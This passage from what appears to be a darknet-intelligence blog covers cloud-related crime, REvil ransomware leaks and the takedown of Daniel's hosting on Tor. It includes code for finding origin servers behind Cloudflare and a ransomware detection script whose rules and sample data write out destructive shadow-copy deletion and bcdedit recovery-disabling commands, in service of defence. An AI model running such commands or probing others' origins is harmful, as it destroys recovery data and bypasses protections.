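              for ip, body in candidate_bodies.items()]
    return [(ip, score) for score, ip in sorted(scored, reverse=True)
            if score >= threshold]


# Constructed data: www and cdn sit behind Cloudflare; the rest resolve
# directly, and dev happens to serve the production site from the origin.
SAMPLE_DNS = {
    "www.example.com": "104.16.1.1",
    "cdn.example.com": "172.64.2.2",
    "mail.example.com": "203.0.113.25",
    "dev.example.com": "203.0.113.80",
    "ftp.example.com": "198.51.100.7",
}
REFERENCE_BODY = ("<html><head><title>Example Corp</title></head><body>"
                  "<h1>Welcome to Example Corp</h1><p>Products, news, careers."
                  "</p></body></html>")
CANDIDATE_BODIES = {
    "203.0.113.80": REFERENCE_BODY,
    "203.0.113.25": "<html><body><h1>Mail gateway</h1><p>No web service.</p></body></html>",
    "198.51.100.7": "<html><head><title>Index of /</title></head><body><pre>pub/</pre></body></html>",
}

if __name__ == "__main__":
    for host, ip, flag in classify_subdomains(SAMPLE_DNS):
        print(f"{host:18s} {ip:15s} cloudflare={flag}")
    print(rank_origin_candidates(REFERENCE_BODY, CANDIDATE_BODIES))
```

Run against your own zone with real lookups (`dns.resolver` for the A records, `http.client` with an explicit `Host` header for the bodies), `exposed_hosts` is the defender’s version of the same dump: any origin that answers directly has to be firewalled to Cloudflare’s ranges, otherwise the proxy’s filtering is bypassed exactly as the thread describes.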

Figure 14: Source, DarkOwl Vision DocID: 4aac980c425b46fd027aad24569249bb

Figure 15: Source, DarkOwl Vision DocID: 2a87de7ad872ebec6b3bc422840b2a32

iCloud

Personal Apple iCloud accounts are a popular target among darknet hackers. For example, one of the most common questions observed by DarkOwl analysts active in underground chatrooms is “How do I hack my girlfriend’s iPhone?”. Torigon user Roxy recently posted a link to an iCloud bypass utility for accessing personal iCloud accounts. The software is advertised to work on iPhone models 5s to X. (Source: e456dc53f7840f85609783e97038156a)

Figure 16: Source, Captured from Torum: http://torigonn6jdlsmga[.]onion/viewtopic.php?f=78&p=1859&t=503

Most Russian forums include service advertisements; like the August 2017 offer below by scriptseller2018. This advertisement detailed the steps for exploiting an Apple ID and iCloud account all packaged together and included in a script the hacker was selling on the forum (Source: bee9c6a7875239502c5e3115fdab144e)

Figure 17: Source, DarkOwl Vision DocID: bee9c6a7875239502c5e3115fdab144e

Abuse of Cloud Resources

While not a direct threat to cloud subscribers, abuse of cloud resources is a concern for cloud providers, particularly for providers that offer IaaS (Infrastructure as a Service) and PaaS (Platform as a Service) models. The most prevalent way this occurs on the darknet is through the sale and usage of dedicated cloud servers, often referred to as “dedics”. There are many examples of users on the darknet that are offering these services.

One notable example is user extremalspeed, who posts advertisements for his services on Russian hacking forums such as Exploit.in and UFOLabs. Deep web forums such as Raidforums are also riddled with similar advertisements.

Figure 18: Source, User extremalspeed offering dedicated servers on Google Cloud, Vultr, Digital Ocean, and AWS, DarkOwl Vision Document ID: 51597bc6ec8f321cc2c9a66db8dae3aa

Figure 19: Source, Raidforums user CloudProvider selling cloud computing accounts from multiple sources. DarkOwl Vision DocID: b6a95f5d0283d001458c0f00ee794a08

Organizations are not the only ones taking advantage of cloud computing; from cracking passwords and encryption keys to hosting exploits and stolen data, hackers are no longer limited to using their own hardware for malicious purposes. There are many tutorials posted to the darknet that describe how to take advantage of free credits offered by cloud providers. User therigbys, of now defunct “KICKASS” forum, notes that there are specific advantages to using Alibaba cloud for spamming purposes – “You can use the credit to own servers, they have quality IP, you can use to spam with little red flags.” Cloud providers are also being used to host phishing sites; Exploit.in forum member the-one expressed plans to host Office 365 phishing pages on Azure.

Figure 20: Source, A tutorial on how to use cloud computing credits for malicious purposes, DarkOwl Vision Document ID: a987d3f5159f5b2c38e6611e9eec1c4d

Figure 21: Source, User The-one looking to buy an office 365 phishing page that can be hosted on Azure, DarkOwl Vision DocID: b61a5a1d19ffa519b8897792a9f49011

Selling Access to Personal Cloud Services

Some hackers sell access to their personal cloud of data dumps, such as DrDastan on Raidforums. This type of service is usually advertised as a subscription service and the seller usually claims to regularly post updates with fresh data.

Figure 22: Source, Raidforums user selling access to their personal cloud of data dumps. DarkOwl Vision DocID: 438f8f9e5126f6aa72c42d5f440fd796

Selling Access to Compromised Servers and Accounts

In recent years, hackers have made many headlines for selling access to an organization’s compromised servers and servers hosted on the cloud are no exception. The following two examples are from hacker forum Exploit.in. In the first example, threat actor Buffer is selling access to an education institute’s platform, which he claims gets 35 million visits per day. In the second example, threat actor onfrich is selling access to Azure server panels of a hospitality company.

Figure 23: Source, Exploit.in user Buffer selling access to an education institute’s cloud platform, DarkOwl Vision Document ID: c5766f4e3f21384f83dfb1fa28aea8e5

Figure 24: Source, Threat Actor onfrich selling Access to Azure server panels of a hospitality company. DarkOwl Vision DocID: e7dd5705b3e45f05ae456bba9941c5c4

In 2019, a user on deep web crime forum, sinister.ly using the moniker, momxia, posted an offer for Google Accounts with $100 USD credit.

Figure 25: Source, DarkOwl Vision DocID: 8b70f34c4b2e09572bdba0bf775384b0

The advertisement included multiple methods to contact them, along with a surface web link to their online store. According to their Selly Store located on the surface web, the Google cloud accounts were available for sale at the price of $6.00 USD. As of time of writing, the seller’s website indicated they were out of stock.

Figure 26: Source, Surface Web screen capture of the same list on momxia’s selly store. Source https://momoxia.selly[.]store/product/80806a1b


See this research featured in the newly released IBM X-Force Cloud Threat Landscape Report 2020


Curious to learn more about our darknet data? Have any questions for our analysts? Contact us.

REvil hackers continue to rack up high-profile targets with ransomware attacks

Since first leaking highly sensitive personal information pertaining to Lady Gaga, the threat actor group has targeted Sherwood Food Distributors and Donald Trump. Our team has been monitoring the situation closely and will continue to update here as new developments arise.

UPDATES (LATEST JUNE 2, 2020)

REvil Hackers Begin Auctioning Compromised Data

While US cities degenerate into destructive police protests and rioting, the REvil hackers show no sign of slowing, adding more victims to their darknet website in recent days. They also introduced an “auction” feature to their website, with Canadian agriculture company Agromart Group’s data as their first lot, starting bids at $50,000 USD.

SODINOKIBI USED AGAINST AGROMART GROUP

Agromart Group is a Canadian agriculture company with offices in Ontario. The Happy Blog post for Agromart suggests the hack of the group’s several companies (including Scotland Agromart Ltd.) likely occurred on or around 26 May 2020. The hackers state they have corporate documents and accounts comprising over 22,000 files and 3 databases. Several accounting spreadsheets appear in the screenshots posted as evidence of the legitimacy of the attack; one spreadsheet appears to consist of a list of Agromart’s customers and their orders. There was also a document labeled “Personal Net Worth Statement” with details of an employee’s personal financial information. It is unclear whether this attack has had, or will have, any impact on Canada’s farming industry.


Early Tuesday morning, the hackers debuted an “auction” section of their darknet blog featuring Agromart, indicating a divergence from the Russian Jokerbuzz darknet auction hidden service mentioned in the Grubman Shire announcement. The minimum deposit in Monero (XMR) is $5,000 USD with a suggested starting price for the files and databases of $50,000 USD. The auction’s “blitz” price is $100,000 USD and will last only a week. The hackers also included links to purchase the Monero cryptocurrency, preferring Monero to Bitcoin transactions.


TELECOMMUNICATIONS AND ENERGY FIRMS NOT IMMUNE

Hackers also posted links to South African telecommunications and mobile phone provider, Telkom, as well as British energy reporting and accounting company, Elexon. The announcement for Telkom’s hack was brief while the hackers included a link to “sample” files from Elexon’s corporate network and multiple screenshots. One included a renewal application form for CFC’s Cyber Private Enterprise, suggesting the company held an insurance policy for such a cyber attack.


According to their public website, Elexon admitted the attack on their internal networks occurred on 14 May 2020 and there was no risk to the public or loss of customer-level data.


We have identified the root cause and are now resolving the
issue. As we do not hold any customer level data, there is no
risk to the public.

ELEXON is not part of the real time physical flow of electricity
from power stations to consumer. Therefore there is no impact to
power supplies.

— elexon.co.uk

Several Law Firms Added in Recent Days

The REvil hackers also debuted hacks from additional US law firms: Indiana-based Wartman Law Firm and Fraser Wheeler and Courtney LLP in Louisiana. The post for Wartman indicates there are several hundred folders of customer and client data compromised and the law office has a week to respond with payment. The hackers state the Fraser Wheeler and Courtney data leak is over 50 GB with a repurchase price of $100,000 USD.


As of this update, DarkOwl has observed 41 data leaks posted to the REvil / Sodinokibi ransomware hackers “Happy Blog.” The post numbering system is up to 76, and we assess there are a large number of corporate victims either not yet mentioned or paid the ransom and avoided public inclusion to the darknet blog.

Given the volume and frequency of new postings, the threatening language used on recent public announcements and the latest introduction of the “auction” feature to their website, it is evident the hackers are feeling more emboldened and confident in the success of their extortion endeavors.

DarkOwl also discovered that data from a previous victim, the National Eating Disorders Association (NEDA), which DarkOwl Vision archived in late March but which has since been removed from the Happy Blog, has recently appeared on a darknet marketplace not previously assessed to have any affiliation with the REvil hackers.


A vendor using the moniker “eternos” registered on the ASEAN market in early May, and the listing for the NEDA database appeared shortly thereafter for as little as $99 USD. There is no intelligence to suggest “eternos” is associated with the REvil hackers: the database could have been collected by an independent darknet group from links shared earlier on REvil’s Happy Blog, or harvested from the NEDA network completely independently of the REvil ransomware attack on the organization.


New Targets Announced over Memorial Day Weekend

While the US celebrated Memorial Day weekend, the REvil/Sodinokibi hackers continued to target corporations around the globe. On Monday, May 26, 2020, the hackers announced another new victim, a law firm called Vierra Magen Marcus LLP. They then announced their next new target, Titan Entertainment, late Tuesday, May 27, 2020. Since DarkOwl Vision’s first capture of the “Happy Blog” V3 hidden service in late February 2020, we know of at least 32 victims of the Sodinokibi ransomware, an average of 2.6 successful infections deemed worth public disclosure per week since the website launched.


VIERRA MAGEN MARCUS LLP

Vierra Magen Marcus LLP is another California-based intellectual property law firm with an extensive client list across “Technology, Science, and Growth Enterprises.” The hackers describe their extorted archive as including 1.2 terabytes of documents, among them patents, non-disclosure agreements, and conflict resolution legal documents.


TITAN ENTERTAINMENT

Late Tuesday, the hackers added another victim, Titan Entertainment, based out of London, UK, with only the URL for the company’s website and the text, “download- Will be soon…” The screen capture provided by the hackers appears to include a list of servers from the company and their associated backups, along with internal IP addresses of the compromised systems. As of the time of writing, the website URL for Titan Entertainment listed on the Happy Blog is unresponsive.

FARO Technologies, a Leading 3D Printing/Manufacturing Company, is Latest Victim of REvil Hackers’ Ransomware Attacks

UPDATE: As of May 27th, Happy Blog no longer contains the post discussed below, suggesting FARO may have paid the ransom demands.

On May 20th, sometime between 11:31 MST and 2:38 MST, the hacking group known as REvil posted an announcement to the darknet forum Happy Blog stating that they had identified and compromised a new target, FARO Technologies. The hackers stated that FARO Technologies had 24 hours to pay their ransom demands, or they would leak 1.5 TBs of FARO’s data to the public. It is unclear how many files REvil has in total.

This announcement comes as the hackers continue to target the high-profile law firm Grubman Shire Meiselas & Sacks – and leak highly sensitive data pertaining to their celebrity clientele.

Per their website, FARO is the world’s most trusted source for 3D measurement, imaging and realization technology. The company develops and manufactures leading edge solutions that enable high-precision 3D capture, measurement and analysis across a variety of industries including manufacturing, construction, engineering and public safety. 

Sometime after making this initial announcement, REvil updated their post to state they were giving FARO Technologies an additional 20 hours due to “a minor technical issue.” Then, in a subsequent post, they stated the following:

“FARO Technologies has exactly 3 hours, after which we will publish a link to the data here. FARO Technologies, if you do not know where to find the instructions, contact your employee [redacted]. He has already visited website, seen the instructions and knows what to do.”

On May 21st, REvil published the below announcement claiming that FARO had failed to meet their ransom demands, including a link to the data files. It is unclear what measures each party took to remediate this situation, though it appears that at some point, FARO’s parent company became involved. To our knowledge, REvil has never stated how much money they have demanded of their hostage.

May 19th/20th – Screenshot of initial announcement, and an image of the data they claimed to have belonging to FARO Technologies

May 21st – Screenshot of the actual data files that the criminal actors released to the public after claiming that FARO would not pay their extortion demands

Items of note in the file-tree shared as a preview of what will allegedly be included in the 1.5 TB data drop include: IT audits, forensic information pertaining to public safety, global research and development files, legal records, and user data. 

REvil Announces Next Target will be Madonna and Claims They’ve had Offers for Buyers for Trump Data

May 18: Just before 7:00PM UTC, DarkOwl Analysts observed an update to Happy Blog with the following announcement. In it, REvil states that Madonna is their next target, and that they will be auctioning off her personal files on the 25th of May. There is no reference to the ongoing ransomware attack they have conducted on Grubman Shire Meiselas & Sacks (GSM), indicating the hackers may be pivoting their approach to making a profit off of selling the personal data of high net worth individuals (instead of just attempting to exploit GSM with ransomware payments).

The hackers are starting the bidding for Madonna’s confidential data at $1 million.

Third Press Release from REvil announcing their next target will be music artist Madonna

The hackers also stated that they have far more information pertaining to Donald Trump than was released in their initial drop, and that they have received several offers from buyers who want the full extent of the information REvil has “accumulated” over time.

In the second press release they published, they address the fact that they have been accused of “bluffing,” maintaining that the full extent of the information they have on Trump is damaging and will lead to public disgrace and financial loss.

Second Press Release from REvil, defending the legitimacy of the files they have that pertain to Donald Trump

REvil also outlines how they do not plan to cease their ongoing Ransomware attack, but do plan on profiting from the money they can make from selling individual client data – regardless of whether GSM has paid their ransom demands.


ORIGINAL POST:

Hollywood Law Firm Hacked; Personal Data of High Profile Individuals Exposed

On May 11, 2020, lawyers for the Hollywood elite, Grubman Shire Meiselas & Sacks (GSM) confirmed publicly they were in the midst of a cyber ransomware attack, with hackers holding hostage some 756 GB of sensitive client data, contracts, and personal information harvested from their main website server, www.gsmlaw.com, which remains offline.

The hackers, believed to be from Eastern Europe, demanded a ransom of $21 Million USD putting the law firm and their clients in a precarious position during already stressful times due to the COVID-19 pandemic.

Hackers Post Entertainment & Media Lawyers Data on Darknet, Date: May 14, 2020

Regardless of where the owners of the law firm are in negotiations with the hackers, and whether or not the FBI has become directly involved, the hackers have already started publishing data from the ransomed servers on the darknet. DarkOwl analysts discovered a Tor hidden service the hackers maintain called “Happy Blog.” It was there that they announced the GSM hack in early May, and it continues to be where the group routinely publishes updates. The hackers’ announcement lists many of GSM’s exclusive clients, such as Madonna, Facebook, Elton John, Barbra Streisand, and Lady Gaga, along with 9 inactive but prepared links for separate data leaks.

The underground website also includes screen captures of over 176 folders listed on the compromised server and what appears to be signed contracts and agreements from Christina Aguilera in 2013 and Madonna’s World Tour 2019/20. There are numerous other famous actors and musicians from Hollywood mentioned.

Sample of the Folders Hacked from the Entertainment Lawyer’s Server

Agreements with Clients Shared on the Darknet to Legitimize the Attack

Lady Gaga Data Exposed

Lady Gaga data leaked by Hackers in 2.2GB file

DarkOwl analysts also discovered the first of the 9 data leaks had been released at 2:00pm UTC on Thursday, May 14, 2020 and included over 2 GB of data related to entertainer, Lady Gaga, due to release a new album at the end of the month. Along with the data leak, the hackers updated the website to state, “we public the first part of the data because the time is up” (confirming that English is not their native language).

A review of the data revealed over 3,000 files across 350 folders, which include but are not limited to W9 forms, expense reports, producer agreements, certificates of engagement, and confidentiality agreements from the last decade. Of particular concern is the folder listed as “Gaga Medical Confidentiality Agreements,” which most likely includes some of the most personally identifiable information for the mega entertainer, such as her social security number.

Sample listing of some of the folders from Lady Gaga Data Leak on May 14th, 2020

The Next High Profile Individual Data-Drop: Donald Trump

On May 14, 2020, the hackers responded even more seriously, doubling the ransom in a new message stating, “The ransom is now [doubled to] $42,000,000 … The next person we’ll be publishing is Donald Trump. There’s an election going on, and we found a ton of dirty laundry on time.” According to PageSix, the hackers added, “Mr Trump, if you want to stay president, poke a sharp stick at the guys, otherwise you may forget this ambition forever. And to you voters, we can let you know that after such a publication, you certainly don’t want to see him as president … The deadline is one week.”

DarkOwl Analysts have confirmed that the second drop did contain information pertaining to Donald Trump. While he was not a client of GSM’s, there were leaks from associates of his that reference him, as well as leaked correspondence between GSM and other clients in which either Trump or Trump’s entertainment holding company were mentioned.

Since Trump was not a client of GSM, the second REvil drop is not like Lady Gaga’s, and his personal files were not made public in any way. Regardless, DarkOwl analysts are currently in the process of reviewing the leaked correspondences for items of note. This blog will be updated accordingly as we do so.

“Small Press Release” Posted on Happy Blog announcing that the next target would be Donald Trump

REvil Announces New Target: Sherwood Food Distributors, LLC

UPDATE: As of (approximately) May 20th, Happy Blog no longer contains the post discussed below, suggesting Sherwood may have paid the ransom demands.

The same group of hackers who just released highly sensitive data relating to Lady Gaga as a part of their ongoing extortion attempt of Grubman, Shire, Meiselas and Sacks have posted on the darknet that they are holding another company for ransom – Sherwood Food and Harvest Distributors. The threat actors posted a notice about their new target around 3pm MST 5/15.

This notice contained a link to download a portion of Sherwood’s proprietary files as “previews,” which they plan on releasing one at a time (8 in total). The first link to leaked information contains roughly 2,300 files. These files contain highly sensitive data including cash-flow analysis, sub-distributor information, detailed insurance information, proprietary vendor information (including for Kroger, Albertsons and Sprouts), scanned driver’s license images for drivers in their distribution networks, etc. The threat actors also posted a conversation they had with Coveware, a leading ransomware mitigation company, dating back to at least May 3rd.

This shows Sherwood has been aware of and dealing with this attack for over a week, and had not made this information public. While the threat actors only posted Coveware’s side of the conversation, it is clear that Coveware attempted to negotiate by acting as a middleman between Sherwood, their board, and the attackers. Also of note is that Grubman, the law firm, also utilized Coveware’s services, which is worth keeping in mind considering these are two supposedly unrelated companies/targets.

Announcement on Happy Blog that Sherwood Food Distributors were the latest targets of REvil hackers

Screen captures of the conversation the hackers had with Coveware, a 3rd party ransomware mitigation firm

Sample Sherwood data that REvil sent to Coveware to show them that their threats were serious

Who are these Hackers?

According to open source reporting, the hackers responsible for the ransomware are known as REvil or Sodinokibi, the group that infamously attacked the foreign exchange company Travelex late last year with similar ransomware. Travelex paid the hackers $2.3 million of the $6 million USD ransom demanded.

There are several mentions of the ransomware developers across English and Russian speaking darknet forums and marketplaces.

The Sodinokibi ransomware authors and their associates have been widely distributing the ransomware through infected JavaScript on WordPress websites. Upon installation on the victim machine, it deletes all Shadow Volume Copies, disables Startup Repair in Windows, and then begins encrypting all the files on the system hard drive.

Once the malware completes its encryption process, Sodinokibi modifies the desktop wallpaper, adding a ransom note, which contains instructions about the decryption process. The ransom note also includes instructions on how to make the payment to have the files decrypted, including unique keys and links to the payment site (likely Monero).
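The two pre-encryption steps described above, deleting Shadow Volume Copies and disabling Startup Repair, are visible in process-creation telemetry before any file is encrypted. The following is an added example (not DarkOwl’s code or part of the original post) of detection logic run over constructed process-creation events; it assumes those steps are carried out through the built-in vssadmin, wmic and bcdedit utilities, and the hosts and command lines are made up for illustration.

```python
"""Detect recovery-inhibition steps (shadow copy deletion, startup repair
disabled) in process-creation events and escalate hosts where both occur.
Sample events are constructed, not real telemetry."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed events in a Sysmon EventID 1 / Security 4688-like shape.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "explorer.exe",
     "cmd": r"C:\Windows\System32\notepad.exe C:\Users\a\notes.txt"},
    {"host": "WS01", "parent": "unknown.exe",
     "cmd": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "WS01", "parent": "unknown.exe",
     "cmd": "bcdedit /set {default} recoveryenabled No"},
    {"host": "WS01", "parent": "unknown.exe",
     "cmd": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"host": "SRV02", "parent": "backup.exe",
     "cmd": "vssadmin.exe List Shadows"},   # benign: listing, not deleting
    {"host": "SRV02", "parent": "WmiPrvSE.exe",
     "cmd": "wmic shadowcopy delete"},
]

# Rule name -> pattern matched case-insensitively against the command line.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)",
        re.IGNORECASE),
    "startup_repair_disabled": re.compile(
        r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+"
        r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
        re.IGNORECASE),
}


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    cmd: str


def detect(events):
    """Return one Finding per (event, rule) pair whose command line matches."""
    findings = []
    for ev in events:
        for name, pattern in RULES.items():
            if pattern.search(ev["cmd"]):
                findings.append(Finding(ev["host"], name, ev["cmd"]))
    return findings


def triage(findings):
    """Per host: 'critical' when every rule fired (the full pattern the text
    describes), 'high' when only one did (could still be an admin action)."""
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f.host].add(f.rule)
    return {host: ("critical" if len(rules) == len(RULES) else "high")
            for host, rules in rules_by_host.items()}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.host}: {f.rule}: {f.cmd}")
    print(triage(found))
```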

Reception to REvil’s latest antics has not been great. Members of the XSS forum have expressed displeasure at how much attention this has brought them, posting:

Translation: “They can’t keep their mouths shut)

Who are they? Threatening the President of the United States is not a very smart thing to do, especially BL#t on the FORUM. They would have rolled out their post about it on THEIR website, where they throw bases – no one would have said a word to them.

And so such clowns generally need to be driven from the forums, so that the water is not muddied. IMHO”

DarkOwl Analysts continue to dig into this hacking group to see what we can uncover. Stay tuned for updates as we will continue to update this blog with new findings.

DarkOwl selects BlueVoyant to deliver comprehensive Managed Detection and Response Security Service

Darknet data specialist DarkOwl draws on BlueVoyant’s deep expertise to strengthen its security posture and protect critical assets and users

New York, NY (April 30th, 2020) – BlueVoyant, a global expert-driven cybersecurity services company, today announced that it has been selected by DarkOwl, providers of the world’s largest index of DarkNet content, to deliver a tailored and comprehensive Managed Security Service. BlueVoyant will provide its advanced Managed Detection and Response (MDR+) capabilities, including support from its team of skilled intelligence analysts and security experts, to protect endpoints, detect intrusion and defend against the latest and most sophisticated security threats.

DarkOwl enables organizations to safely search the world’s largest dataset of darknet content. Its Vision API enables its data to be directly integrated into a client’s native platforms, while its DarkINT risk scores simplify risk management based on the organization’s darknet footprint. Monitoring and alerting enable clients to quickly discover breached material appearing on the darknet.

As an expert in analyzing the cyber threat landscape, DarkOwl was looking for a security solution that goes beyond the current patchwork of point products and is instead modeled directly on the company’s unique data and activities, as Mark Turnage, CEO of DarkOwl, explains: “The threat landscape continues outpacing threat defense and it has become obvious that the existing model for protecting critical assets, end-users and endpoints is flawed. Instead of choosing yet another partial solution that can only determine threat and compromise based on triggered rulesets or known patterns of behavior, we chose BlueVoyant’s MDR+ approach to get ahead of the curve. By modeling its service on our data and the output of our activities BlueVoyant is able to detect issues and compromise much earlier.”

BlueVoyant’s Managed Detection and Response (MDR+) provides real-time and customized threat response and remediation – terminating malicious processes, isolating devices, and manually preventing persistence and lateral movement associated with sophisticated attacks. BlueVoyant incorporates client-driven rules of engagement (ROE) enabling immediate, decisive action to stop threats that could cripple a network versus non-critical events where a lower-tiered response may be appropriate. The service combines an expert team, comprehensive threat data analytics, and advanced technology solutions to deliver remote endpoint monitoring and protection, threat detection, and incident remediation. BlueVoyant MDR+ includes:

● 24/7/365 detection and response support by expert analysts with over 200 years of collective Security Operations and Threat Hunting experience who operate across multiple global locations

● Detection and blocking of malware, ransomware, zero-days, non-malware and file-less attacks

● Remote endpoint incident investigation and remediation led by BlueVoyant’s security operations specialists.

Support from highly skilled cybersecurity professionals to lift the burden from in-house teams was a key factor in DarkOwl’s decision to select BlueVoyant, as Mark Turnage explains: “Running this program ourselves is not a possibility and would deplete far too many resources from our core business, DarkNet Intelligence. We appreciate BlueVoyant’s ongoing model and execution of selecting and hiring the best-of-breed and most experienced staff.”

Mark continues: “DarkOwl was looking for best-in-class managed Endpoint Security and Threat/Compromise Detection and Response capabilities and found them in BlueVoyant. We see their services as remarkably robust and industry leading, and it made sense for DarkOwl to go with the best in the business.”

Jim Rosenthal, CEO, BlueVoyant comments: “The fast pace and complex evolution of the cyber threat landscape makes it hard for under-pressure internal teams to stay current with every emerging threat. The unrivalled knowledge and experience of our team, combined with our advanced technology and proprietary datasets, provides deep expertise and oversight that means clients like DarkOwl can be confident that their business is protected.”

-ENDS-

About BlueVoyant

BlueVoyant is an expert-driven cybersecurity services company whose mission is to proactively defend organizations of all sizes against today’s constant, sophisticated attackers and advanced threats. Led by CEO, Jim Rosenthal, BlueVoyant’s highly skilled team includes former government cyber officials with extensive frontline experience in responding to advanced cyber threats on behalf of the National Security Agency, Federal Bureau of Investigation, Unit 8200 and GCHQ, together with private sector experts. BlueVoyant services utilize large real-time datasets with industry leading analytics and technologies. Founded in 2017 by Fortune 500 executives and former Government cyber officials and headquartered in New York City, BlueVoyant has offices in Maryland, Tel Aviv, San Francisco, London and Latin America.

About DarkOwl

DarkOwl was founded with the mission of collecting the broadest dataset of darknet content available in the cyber-defense industry and making that data both accessible and valuable to its clients. By empowering its customers to have eyes on the darknet, DarkOwl enables organizations to fully understand their security posture, detect potential breaches, mitigate them quickly, and investigate even the furthest and most obscure reaches of the internet.

Daniel goes dark for good

On March 10th 2020, hackers targeted one of the most prominent anonymous website hosting providers on the darknet, Daniel Winzen, subsequently knocking over 7,500 hidden services across Tor offline. DarkOwl analysts, who regularly monitor the darknet directly, observed this event occur via DarkOwl’s Vision platform and have spent recent days reviewing what happened to quantify the impact to the darknet.

Editor’s note: the following report contains explicit language and references sensitive material.

Screenshot of Daniel’s PHP chat during the recent March 10, 2020 hack

Who is Daniel Winzen?

Source: DanWin github user profile picture

Daniel Winzen, also known as “DanWin” or @daniel, has been a major player in the darknet community for at least the last five years. The German 20-something-year-old has long provided hosting and directory services, as well as e-mail and communication mediums such as Jabber+XMPP and a PHP-based anonymous chat built on the Le-Chat code base, across Tor and I2P.

Winzen has been applauded by some for consistently providing the technical services he has, while others have criticized him for facilitating the distribution of illegal content from scammers and pedophiles.

Target: Daniel’s Chat SQL Database

Around 01:00 UTC in the early hours of March 10th 2020, members present in Daniel’s Chat were surprised to see their super admin, @daniel online. Since the last attack against Daniel’s Hosting services in November 2018, @daniel rarely visited the chatroom, blaming member-infighting and a busy work schedule. It took no time to notice that the topic for the chatroom had been modified to “ALL YOUR BASE ARE BELONG TO US. ALL SHALL BOW BEFORE ME OR FACE MY WRAITH” [sic] and @daniel was not actually commanding his account in the chatroom.

A guest account using the moniker @null was rapidly promoted to an administrator role, kicked staff and members out of the chatroom, and promoted another guest account with the moniker @Pickle. The new admin, @null, had little to say, but did post an all-caps declaration positioning themselves as “king” and demanding everyone “bow” to them.

03-10 01:39:27 – null – I am your king now
03-10 02:15:04 – null – are you not going to bow before me? Your new leader
03-10 02:20:03 – null is now a registered applicant.
03-10 02:21:24 – null – I HAVE COME FOR YOU
03-10 02:23:49 – null – YOU SHALL ALL BOW BEFORE ME
03-10 02:27:13 – null – i have seized control over the chat;
03-10 02:28:35 – null – By the way, this chat logs your headers and has a backup of everything you say. You’ve all essentially been joining a honeypot.
03-10 02:31:52 – null – Also, daniel is no more
03-10 02:36:37 – Pickle is now a registered member.
03-10 03:46:42 – null – stick around
03-10 03:46:55 – null – You’ll see the bigger picture soon

— Excerpt from Daniel’s Chatroom Transcript, March 10, 2020

Then, at 02:51 UTC, a chat user named @Dolly emerged without “entering,” stating that the hackers stole @daniel’s chat password and that the server itself had not been compromised. @Dolly also said, “Doesn’t look like you can delete @Syntax” suggesting that @Dolly was likely an alternate account for the chatroom’s controversial super administrator, @Syntax. She also confirmed that @daniel was not logged in as he was not usually awake this early to do so.

@Dolly’s arrival prompted dialogue between the hacker @null and chatroom users, while @Syntax expressed less interest in fighting and was more interested in discussing the “reasoning” behind the hack.

At one point, @Dolly commends the alleged responsible parties by saying, “I’m kinda in awe as to what you did.”

03-10 03:01:11 – Dolly – @null I see. I mean if that is what you wanted, I think that the parties running the chat would have handed it to you.
03-10 03:01:08 – xTIFFys – How so? @Z
03-10 03:00:54 – Z – chat got fucked
03-10 03:00:03 – xTIFFys – Hey. @meerkat
03-10 02:59:55 – null – I’ve downloaded everything I wanted.
03-10 02:59:52 – meerkat – Hakuna Matata =(^.^)= ❤ @xtiffys
03-10 02:59:37 – null – why not?
03-10 02:58:57 – xTIFFys – Hello everyone.
03-10 02:58:19 – xTIFFys entered the chat.
03-10 02:57:36 – Dolly – I won’t fight you, I really would like to know the reasoning
03-10 02:57:16 – meerkat – Delete what
03-10 02:56:49 – Dolly – Why do you want to delete it?
03-10 02:56:28 – Dolly – @null. Okay.
03-10 02:56:12 – Dolly – What’s the goal?
03-10 02:56:05 – null – I plan on deleting it
03-10 02:55:58 – null – No @Dolly
03-10 02:54:56 – anon – @null what do you mean this server is a honey pot
03-10 02:54:53 – Dolly – So this place in gonna turn back into a doxing, pedophile wonderland.
03-10 02:54:14 – Z – heh @meerkat
03-10 02:54:12 – Dolly – Thats how I know they don’t have server access, they just have site access.
03-10 02:53:48 – meerkat – Someone should make me a mod so I can get a back door through the filters again
03-10 02:53:27 – meerkat – You need server admin to delete syntax 😂 nice try though
03-10 02:53:05 – Dolly – Its too early for daniel to be awake, in about an hour or so.

— Excerpt from Daniel’s Chatroom Transcript, March 10, 2020

For the next hour, @Syntax along with various guests and transient members chatted about random subjects ranging from EU and German laws around pedophilia to the 19th Amendment, while random trolls entered and continued to attack only @Syntax directly. One chat member and presumed online boyfriend of @Syntax, known by the moniker @Fuggles, joined the chat and had little to say.

One guest to the chatroom suggested the hack was organized by @Syntax to break up with @Fuggles, while another long-time user and former staff member of Daniel’s Chat, known as @meerkat, simply hypothesized that the hacker @null and @Syntax were one and the same person, essentially alleging that this was orchestrated from the inside.

03-10 03:36:14 – meerkat – I have a feeling @null is syntax.
03-10 03:36:19 – xTIFFys – I think that guy was strangled not shot. @anon
03-10 03:36:27 – meerkat – Actually if be willing to bet my next pay check
03-10 03:37:21 – xTIFFys – Wish I had that kind of security, @meerkat.
03-10 03:37:25 – xTIFFys – LOLZ
03-10 03:38:11 – meerkat – Hehe me too @xtiffys if I were to lose I’d be broke for a month

— Excerpt from Daniel’s Chatroom Transcript, March 10, 2020

By 04:00 UTC, the hacker had kicked @Syntax and all guests using variations of her nickname from the room. Less than 10 minutes later, @null stated Daniel’s Chat was the last site left on Daniel’s Hosting. This suggests that while everyone was conversing, the hacker or hackers were busy deleting the web services hosted on Daniel’s servers using the elevated privileges of @daniel’s admin account. We find this to be at least partially true, as it appears that the hackers targeted Daniel’s databases via the chatroom and not the web server content, such as raw HTML and CSS files.

At 04:31 UTC, Daniel’s account simply announced, “pwned.” At 04:32 UTC, the chatroom returned the message “Fatal error: No connection to database!”, suggesting the hack was complete and the chat database was no longer online.

The method and the justification

